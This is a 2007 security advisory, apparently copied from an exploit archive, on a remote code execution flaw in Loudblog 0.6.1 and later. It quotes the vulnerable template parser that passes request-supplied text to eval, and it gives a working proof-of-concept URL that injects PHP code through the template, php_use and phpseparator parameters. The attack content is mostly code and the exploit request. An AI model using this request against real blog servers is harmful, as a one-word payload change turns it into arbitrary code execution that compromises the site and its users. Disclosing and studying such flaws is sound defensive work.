----[ Loudblog Remote Code Execution ... ITDefence.ru Antichat.ru ] Loudblog >= 0.6.1 Remote Code Execution Eugene Minaev underwater@itdefence.ru ___________________________________________________________________ ____/ __ __ _______________________ _______ _______________ / . / /_// // / / __ /__/ / / / /_// / / / / / /___/ / / / / / / / / / / / / / / / / /__ // / ____________/ / / __________// /__ // / /\ \_______/ \________________/____/ 2007 /_//_/ // // \ // // / . \ -[ ITDEFENCE.ru Security advisory ]- // // / . . \_\________[________________________________________]_________//_//_/ . . Template parser function <?php $parsedpage = fullparse(firstparse(hrefmagic($template))); //do we have php code within our template? switch between echo and eval! if ($php_use) { $templatepieces = explode ($phpseparator, $parsedpage); for ($i = 0; $i <= count($templatepieces); $i += 2) { echo $templatepieces[$i]; if (isset($templatepieces[$i+1])) eval ($templatepieces[$i+1]); } //no php code, no eval! } else { echo $parsedpage; } ?> loudblog/inc/parse_old.php?template=@phpinfo();@&php_use=1&phpseparator=@&parsedpage=@phpinfo();@ ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] # sebug.net
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京ICP备10040895号
暂无评论